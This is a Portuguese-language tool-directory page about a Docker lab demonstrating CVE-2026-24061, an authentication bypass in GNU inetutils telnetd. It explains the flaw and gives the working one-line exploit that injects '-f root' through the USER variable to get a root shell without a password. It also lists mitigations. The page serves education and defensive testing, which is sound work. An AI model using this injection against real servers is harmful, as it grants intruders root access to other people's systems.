Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
telnet-inetutils-auth-bypass-CVE-2026-24061 — Este é um PoC simples que permite destacar a gravidade da vulnerabilidade Telnet ativa e explorada que está ocorrendo neste momento. Por que as pessoas ainda usam Telnet... não sei. | Kitploit
Ferramentas/GitHubGitHub/jakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061
Segurança de ContêineresAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAprendizado e EducaçãoLabs e Prática
GitHubjakeswiz/telnet-inetutils-auth-bypass-cve-2026-24061

telnet-inetutils-auth-bypass-CVE-2026-24061

Este é um PoC simples que permite destacar a gravidade da vulnerabilidade Telnet ativa e explorada que está ocorrendo neste momento. Por que as pessoas ainda usam Telnet... não sei.

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
1há 6 mesesAinda não revisado

CVE-2026-24061: Bypass de Autenticação no GNU inetutils-telnetd

Um laboratório Docker para demonstrar a CVE-2026-24061 — uma vulnerabilidade crítica de bypass de autenticação no GNU inetutils telnetd que ficou sem correção por 11 anos.

A Vulnerabilidade

O Telnetd passa a variável de ambiente USER diretamente para o /usr/bin/login sem sanitização. O binário login possui uma flag -f que ignora a autenticação (destinada a sessões pré-autenticadas). Ao definir USER='-f root', um atacante engana o login para conceder acesso root sem senha.

Versões afetadas: GNU inetutils 1.9.3 (março de 2015) até 2.7 Pontuação CVSS: 9.8 (Crítico) Correção: Atualize para inetutils 2.8+

Início Rápido

root@kitploit:~
# Construir a imagem
docker build -t telnetd-exploit .

# Executar o contêiner (abre um shell como user1)
docker run --rm -it telnetd-exploit

# Exploração — obtenha root sem senha
USER='-f root' telnet -a localhost

Você cairá em um shell root. Execute whoami para confirmar.

Como Funciona

root@kitploit:~
1. O cliente conecta com: USER='-f root' telnet -a localhost
2. O telnetd recebe a variável de ambiente USER: "-f root"
3. O telnetd executa: /usr/bin/login -f root
4. O login interpreta -f como "ignorar autenticação, usuário já verificado"
5. O atacante obtém shell root — sem necessidade de senha

Por Que -f Existe

A flag -f é legítima — ela existe para cenários em que o usuário já está autenticado (por exemplo, a partir de uma sessão local confiável). O bug é que o telnetd não sanitiza a variável USER antes de passá-la ao login, permitindo que atacantes remotos injetem a flag.

Impacto

Em janeiro de 2026:

  • ~800.000 servidores Telnet expostos globalmente (Shadowserver)
  • ~290.000 indexados no Shodan
  • Vulnerabilidade ativamente explorada na natureza (catálogo KEV da CISA)

Por Que Você Não Deveria Usar Telnet

Mesmo sem esse bug, o Telnet transmite tudo em texto puro — incluindo senhas. Use SSH em vez disso.

ProtocoloCriptografiaAutenticação
TelnetNenhumaTexto puro
SSHSimChave/Senha

Arquivos

root@kitploit:~
.
├── Dockerfile              # Constrói contêiner Debian vulnerável
├── docker-entrypoint.sh    # Inicia o inetd, faz downgrade para user1
└── README.md

Mitigação

  1. Atualize para GNU inetutils 2.8+
  2. Desative o telnetd — bloqueie a porta 23
  3. Use SSH — estamos em 2026

Referências

  • CVE-2026-24061
  • Aviso Original
  • Entrada KEV da CISA

Créditos

Laboratório baseado em leonjza/inetutils-telnetd-auth-bypass

Baixar ferramenta